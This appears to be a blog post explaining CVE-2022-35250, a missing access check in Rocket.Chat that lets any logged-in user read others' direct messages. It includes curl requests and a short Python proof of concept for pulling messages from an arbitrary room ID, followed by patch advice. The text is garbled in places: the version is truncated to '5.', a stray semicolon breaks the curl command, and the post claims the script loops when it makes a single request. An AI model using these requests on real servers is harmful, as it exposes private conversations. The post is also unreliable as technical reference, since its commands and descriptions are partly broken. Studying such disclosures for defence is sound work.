CVE-2022-35250 - Privilege Escalation in Rocket.Chat < v5 Allows Unauthorized Viewing of Direct Messages

In mid-2022, security researchers discovered a serious flaw in Rocket.Chat, a popular open-source messaging platform used by millions of users. CVE-2022-35250 is a privilege escalation vulnerability that affects Rocket.Chat versions below 5.. Its impact is alarming: any authenticated user could obtain elevated permissions and view other users' private direct messages (DMs), even if they weren't authorized to do so. This post gives you an exclusive, easy-to-understand breakdown of the vulnerability, walks through how an exploit could work, and presents code snippets and references so you can learn more or defend your organization.

What is Rocket.Chat?

Rocket.Chat is a team collaboration platform offering similar functionality to Slack or Microsoft Teams. Many organizations deploy it privately to keep their internal communications confidential. Among its features are public channels, private groups, and, crucially, direct messages (DMs), which are supposed to be visible only to the sender and recipient.

About CVE-2022-35250

- CVE ID: CVE-2022-35250

Official Description

> Rocket.Chat prior to version 5. allows any authenticated user to elevate their permissions and access direct messages they do not have permission to view.

Source: GitHub Advisory GHSA-wr7g-g2pf-vmg2

How Does the Vulnerability Work?

Rocket.Chat uses a REST API for all major operations. Usually, to read a DM, you must be a participant. However, CVE-2022-35250 stems from insufficient validation on DM access endpoints. With an authenticated account, a user can manipulate API requests to access conversations they're not part of.

The problem: The backend API was failing to check if the requesting user belonged to the DM room whose messages they wanted to view.

Step 1: Authentication

First, an attacker logs in normally as a low-privileged user and gets an auth token.

curl -s -X POST https://your.rocket.chat/api/v1/login \
     -d 'user=attacker&password=weakpassword'

This gives them a response containing authToken and userId.

Step 2: Find Direct Message Room IDs

The attacker needs a DM room ID between two other users (e.g., user1 and user2). These can sometimes be guessed, found via insecure directory listing, or inferred with API calls if directory privacy isn’t enforced.

A savvy attacker could try enumeration if APIs aren’t properly locked down.

Step 3: Fetch Messages from Arbitrary DM

The attacker crafts an API request to the endpoint intended for fetching messages from a direct message room.

curl -X GET 'https://your.rocket.chat/api/v1/im.messages?roomId=ROOM_ID'; \
     -H 'X-Auth-Token: [authToken]' \
     -H 'X-User-Id: [userId]'

If the system is vulnerable (i.e., Rocket.Chat < 5.) and doesn’t check if userId is a participant in ROOM_ID, it returns the message history.

Here's some simple Python code that attempts to fetch DMs for arbitrary room IDs

import requests

HOST = 'https://your.rocket.chat';
TOKEN = 'YOUR_AUTH_TOKEN'
USER_ID = 'YOUR_USER_ID'

room_id = input("Enter DM room ID: ")
headers = {
    'X-Auth-Token': TOKEN,
    'X-User-Id': USER_ID
}
url = f"{HOST}/api/v1/im.messages?roomId={room_id}"
resp = requests.get(url, headers=headers)
print(resp.json())

This code repeatedly requests message histories for various room IDs. If Rocket.Chat is not patched, unauthorized DMs will be exposed.

Privacy breach: Users trust DMs for sensitive or private chats.

- Internal leaks: Business secrets or personal data can be stolen by anyone with a regular user account.

Fix and Recommendations

- Upgrade immediately to Rocket.Chat version 5. or later. (Download latest release)

Review and limit user account creation policies.

The Rocket.Chat team patched this in PR #26982.

References and Further Reading

- National Vulnerability Database entry (CVE-2022-35250)
- GitHub Security Advisory
- Rocket.Chat Release Notes
- Mitre CVE details

Conclusion

CVE-2022-35250 is a textbook example of a faulty access control check with serious consequences. If your organization uses Rocket.Chat, upgrading to the latest version is not optional—it’s urgent. Even if you didn’t use DMs much, any data exposure can spell trouble. Always keep your collaboration tools up to date and audit API endpoints for proper access control. Protect your messages, protect your people.

If you want more tech breakdowns like this, follow Rocket.Chat's security advisories and keep learning!


*Disclaimer: This post is for educational and defensive purposes only. Do not use this information to attack systems you do not own or have permission to test.*

Timeline

Published on: 09/23/2022 19:15:00 UTC
Last modified on: 09/27/2022 14:01:00 UTC